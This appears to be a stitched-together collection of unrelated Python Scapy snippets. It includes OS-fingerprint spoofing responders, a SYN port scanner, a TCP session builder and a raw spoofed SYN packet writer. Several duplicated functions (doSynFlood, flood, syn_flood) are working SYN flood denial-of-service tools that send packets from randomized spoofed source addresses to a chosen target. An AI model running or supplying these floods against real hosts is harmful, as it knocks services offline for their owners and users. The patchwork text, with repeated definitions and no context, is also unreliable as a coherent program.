def service_craft(pkt, fp, mac, service, type_=False):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.ttl, 16)
ip.flags = 0x4000
tcp = TCP()
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
if type_:
tcp.flags = 0x018 # PSH / ACK
tcp.seq = pkt[TCP].seq
tcp.ack = pkt[TCP].ack
data = service[pkt[TCP].dport]
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
return fin_pkt
else:
tcp.flags = 0x012 # SYN / ACK
tcp.seq = pkt[TCP].seq
tcp.ack = pkt[TCP].seq + 1
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def seqgen_pkt_craft(pkt, fp, mac, pno):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe['T1']['TTL'], 16)
ip.flags = fp.probe['T1']['DF']
ip.id = fp.ip_id_gen()
tcp = TCP()
s_val = fp.probe['T1']['S']
if s_val == 'Z':
tcp.seq = 0
elif s_val == 'A':
tcp.seq = pkt[TCP].ack
elif s_val == 'A+':
tcp.seq = pkt[TCP].ack + 1
else:
tcp.seq = fp.tcp_seq_gen()
a_val = fp.probe['T1']['A']
if a_val == 'Z':
tcp.ack = 0
elif a_val == 'S':
tcp.ack = pkt[TCP].seq
elif a_val == 'S+':
tcp.ack = pkt[TCP].seq + 1
else:
tcp.ack = pkt[TCP].seq + 369
flag_val = fp.probe['T1']['F']
tcp.flags = flag_val
tcp.window = fp.probe['WIN']['W' + pno]
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
tcp.options = fp.probe['OPS']['O' + pno]
rd_val = fp.probe['T1']['RD']
if rd_val != '0':
crc = int(rd_val, 16)
data = b'TCP Port is closed\x00'
data += compensate(data, crc)
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
else:
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
def doSynFlood(origin_ip=None, origin_port=None,
target_ip=None, target_port=None,
interface=None, duration=None, gap=0):
'''
Starts Syn Flood attacks
Arguments:
origin_ip (str): attacker ip
origin_port (int): attacker port
target_ip (str): target ip
target_port (int): target port
interface (str): network interface to use
duration (int): duration of the attack
gap (int): gap (delay) between packets
Returns:
None
'''
# Check if everything is filled out
if target_ip is None:
return
if target_port is None:
return
if duration is None:
return
if gap >= duration:
return
# Prepare the packet
ip_layer = IP()
ip_layer.src = origin_ip
ip_layer.dst = target_ip
tcp_layer = TCP()
tcp_layer.sport = origin_port
tcp_layer.dport = target_port
tcp_layer.flags = "S"
# Prepare timings
time_start = time()
time_end = time_start + duration
# Start attack
while (time() <= time_end): #duration
# Constantly changing values
tcp_layer.seq = GenerateRandomSafeSeq()
tcp_layer.ack = GenerateRandomSafeSeq()
tcp_layer.window = GenerateRandomWindow()
attack_packet = ip_layer/tcp_layer # packet to send
send(attack_packet, iface=interface)
if gap > 0:
sleep(gap) #gap
def configureTCPPacket(port):
TCP_Packet = TCP()
TCP_Packet.dport = port
TCP_Packet.flags = "S" # SYN
TCP_Packet.seq = getRand()
TCP_Packet.sport = getRand()
TCP_Packet.window = getRand()
return TCP_Packet
def is_port_open(ip_addr, port, timeout=5, verbose=False):
ip = IP()
ip.dst = ip_addr
syn = TCP()
syn.sport = choice(range(1000, 50000))
syn.dport = port
syn.flags = 'S'
syn.seq = 1
packet = ip/syn
synack = sr1(packet, timeout=timeout, verbose=verbose)
if synack and synack.sprintf('%TCP.flags%') == 'SA':
return True
return False
def flood(target):
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose = False)
except Exception as e:
print(f"{Fore.MAGENTA}Error while sending SYN packet\n{Fore.MAGENTA}{e}{Fore.RESET}")
else:
print(f"{Fore.GREEN}[+] {Fore.YELLOW}SYN packet sent to {'{}:{}'.format(*target)}.{Fore.RESET}")
def syn_flood(ip_destination, port_destination, limit):
total = 0
print("Enviando Pacotes")
for x in range(0, limit):
ip_packet = IP()
ip_packet.src = ".".join(
map(str, (random.randint(0, 255) for _ in range(4))))
ip_packet.dst = ip_destination
tcp_packet = TCP()
tcp_packet.sport = random.randint(1000, 9000)
tcp_packet.dport = port_destination
tcp_packet.flags = "S"
tcp_packet.seq = random.randint(1000, 9000)
tcp_packet.window = random.randint(1000, 9000)
print("Source: " + ip_packet.src + ":" + str(tcp_packet.sport))
send(ip_packet / tcp_packet, verbose=0)
total += 1
print("All packets sent")
def syn_flood():
global FINISH
while True:
if FINISH:
break
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target_ip
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target_port
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(e)
else:
print("[+] SYN packet sent!")
def flood(target):
IP_Packet = IP()
IP_Packet.src = random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(f"[{red} bold][✘] ERROR[/{red} bold] " +
f"[{yellow}]while sending SYN packet[/{yellow}]\n{e}")
else:
print(f"[{green}][✔] SUCCESS[/{green}] " +
f"[{yellow}]SYN packet sent to[{yellow}] " +
f"[{blue}]{'{}:{}'.format(*target)}")
def server_tcp(self, flags, payload=b"", count=True):
data_length = max(len(payload), 1)
tcp = TCP()
tcp.flags = flags
tcp.sport = self.service
tcp.dport = self.client_port
tcp.seq = self.ss
tcp.ack = self.sa
if count:
self.ss += data_length
self.ca += data_length
packet = Ether(src=self.server.mac, dst=self.client.mac)
packet /= IP(src=self.server.ip, dst=self.client.ip)
packet /= tcp
if len(payload) > 0:
packet /= payload
self.packets.append(packet)
def flood(target):
IP_Packet = IP()
IP_Packet.src = random_IP()
IP_Packet.dst = target[0]
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target[1]
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
for _ in range(16):
try:
send(IP_Packet / TCP_Packet, verbose=False)
except Exception as e:
print(
f"\033[1m{cs('[✘] ERROR', red)}\033[0m {cs('while sending SYN packet', yellow)}\n{e}"
)
else:
print(
f"{cs(f'[✔] SUCCESS', green)} {cs(f'SYN packet sent to', yellow)} {blue}{'{}:{}'.format(*target)}\033[0m"
)
def t2tot7_craft(pkt, fp, mac, tno):
try:
ether = Ether()
ether.src = mac
ether.dst = pkt[Ether].dst
ether.type = 0x800
except IndexError:
ether = None
ip = IP()
ip.src = pkt[IP].dst
ip.dst = pkt[IP].src
ip.ttl = int(fp.probe[tno]['TTL'], 16)
ip.flags = fp.probe[tno]['DF']
ip.id = random.randint(1, 1000)
tcp = TCP()
s_val = fp.probe[tno]['S']
if s_val == 'Z':
tcp.seq = 0
elif s_val == 'A':
tcp.seq = pkt[TCP].ack
elif s_val == 'A+':
tcp.seq = pkt[TCP].ack + 1
else:
tcp.seq = pkt[TCP].ack + 369
a_val = fp.probe[tno]['A']
if a_val == 'Z':
tcp.ack = 0
elif a_val == 'S':
tcp.ack = pkt[TCP].seq
elif a_val == 'S+':
tcp.ack = pkt[TCP].seq + 1
else:
tcp.ack = pkt[TCP].seq + 369
flag_val = fp.probe[tno]['F']
tcp.flags = flag_val
w_val = fp.probe[tno]['W']
if w_val == 'ECHOED':
tcp.window = pkt[TCP].window
else:
tcp.window = w_val
tcp.sport = pkt[TCP].dport
tcp.dport = pkt[TCP].sport
o_val = fp.probe[tno]['O']
if o_val == 'EMPTY':
pass
else:
tcp.options = o_val
rd_val = fp.probe[tno]['RD']
if rd_val != '0':
crc = int(rd_val, 16)
data = b'TCP Port is closed\x00'
data += compensate(data, crc)
fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data
else:
fin_pkt = ip / tcp if ether is None else ether / ip / tcp
return fin_pkt
#!/usr/bin/python
from scapy.all import IP, TCP
a = IP()
a.src = "1.2.3.4"
a.dst = "10.0.2.15"
a.ihl = 5
b = TCP()
b.sport = 1551
b.dport = 23
b.seq = 1551
b.flags = 'S'
pkt = a/b
with open("packet", "wb") as f:
f.write(bytes(pkt))
